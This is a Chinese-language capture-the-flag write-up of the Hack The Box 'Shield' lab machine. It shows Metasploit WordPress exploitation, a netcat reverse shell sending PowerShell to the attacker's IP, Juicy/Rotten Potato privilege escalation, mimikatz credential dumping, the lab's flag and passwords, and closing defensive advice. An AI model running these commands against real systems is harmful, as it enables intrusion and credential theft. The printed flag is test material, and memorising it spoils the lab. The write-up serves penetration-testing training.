记HACK THE BOX Shield靶场拿flag
字数 1013 2025-08-15 21:34:06

HACK THE BOX Shield靶场渗透实战教学文档

靶场概述

  • 目标IP: 10.10.10.29
  • 最终目标: 获取flag并提升至管理员权限
  • 系统环境: Windows Server 2016

一、信息收集阶段

1. 端口扫描

使用nmap进行初步扫描,发现开放端口:

  • 80端口:HTTP服务
  • 3306端口:MySQL服务

2. 目录扫描

使用dirsearch工具扫描网站目录结构:

  • 发现WordPress CMS系统
  • 访问WordPress登录页面:/wordpress/wp-login.php

二、初始访问

1. WordPress登录

使用已知凭据登录:

  • 用户名: admin
  • 密码: P@s5w0rd!

2. 获取Webshell

使用Metasploit框架获取Webshell:

msfconsole  # 进入Metasploit攻击框架
search wp_admin  # 搜索WordPress相关攻击模块
use 0  # 使用编号为0的模块
show options  # 查看需要配置的参数
set RHOSTS 10.10.10.29  # 设置目标IP
set USERNAME admin  # 设置用户名
set PASSWORD P@s5w0rd!  # 设置密码
exploit  # 执行攻击

成功获取Webshell,但连接不稳定。

三、稳定连接

1. 上传Netcat

将nc64.exe上传至服务器:

  • 上传路径: C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc64.exe

2. 建立稳定连接

在Kali端监听:

nc -lvp 1111

在目标机器上创建批处理文件:

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc64.exe -e powershell.exe 10.10.14.6 1111 > shell.bat

四、权限提升

1. Rotten Potato攻击

利用Windows Server 2016的Rotten Potato漏洞提权:

JP.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337

注意:如果1111端口无响应,可尝试其他端口(如4567)。

2. 获取管理员权限

成功执行后,Kali端会收到返回的shell,此时已获得管理员权限。

五、获取Flag

查看目标桌面,获取flag:

6e9a9fdc6f64e410a68b847bb4b404fa

六、横向移动(可选)

1. 使用Mimikatz获取域凭据

上传mimikatz到目标机器,执行以下命令:

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

获取到域内其他账户:

  • 用户名: sandra
  • 密码: Password1234!

关键点总结

  1. 信息收集:nmap和dirsearch是渗透测试的基础工具
  2. 已知凭据利用:尝试使用默认或已知凭据登录
  3. Metasploit使用:快速获取初始访问权限
  4. 连接稳定性:上传netcat建立稳定连接
  5. 权限提升:利用Rotten Potato漏洞提权
  6. 凭证收集:使用mimikatz进行横向移动

防御建议

  1. 定期更改管理员密码,避免使用弱密码
  2. 及时更新系统和CMS补丁
  3. 限制上传文件类型,防止恶意文件上传
  4. 监控异常进程和网络连接
  5. 实施最小权限原则,限制服务账户权限
HACK THE BOX Shield靶场渗透实战教学文档 靶场概述 目标IP: 10.10.10.29 最终目标: 获取flag并提升至管理员权限 系统环境: Windows Server 2016 一、信息收集阶段 1. 端口扫描 使用nmap进行初步扫描,发现开放端口: 80端口:HTTP服务 3306端口:MySQL服务 2. 目录扫描 使用dirsearch工具扫描网站目录结构: 发现WordPress CMS系统 访问WordPress登录页面: /wordpress/wp-login.php 二、初始访问 1. WordPress登录 使用已知凭据登录: 用户名: admin 密码: P@s5w0rd ! 2. 获取Webshell 使用Metasploit框架获取Webshell: 成功获取Webshell,但连接不稳定。 三、稳定连接 1. 上传Netcat 将nc64.exe上传至服务器: 上传路径: C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc64.exe 2. 建立稳定连接 在Kali端监听: 在目标机器上创建批处理文件: 四、权限提升 1. Rotten Potato攻击 利用Windows Server 2016的Rotten Potato漏洞提权: 注意:如果1111端口无响应,可尝试其他端口(如4567)。 2. 获取管理员权限 成功执行后,Kali端会收到返回的shell,此时已获得管理员权限。 五、获取Flag 查看目标桌面,获取flag: 六、横向移动(可选) 1. 使用Mimikatz获取域凭据 上传mimikatz到目标机器,执行以下命令: 获取到域内其他账户: 用户名: sandra 密码: Password1234 ! 关键点总结 信息收集 :nmap和dirsearch是渗透测试的基础工具 已知凭据利用 :尝试使用默认或已知凭据登录 Metasploit使用 :快速获取初始访问权限 连接稳定性 :上传netcat建立稳定连接 权限提升 :利用Rotten Potato漏洞提权 凭证收集 :使用mimikatz进行横向移动 防御建议 定期更改管理员密码,避免使用弱密码 及时更新系统和CMS补丁 限制上传文件类型,防止恶意文件上传 监控异常进程和网络连接 实施最小权限原则,限制服务账户权限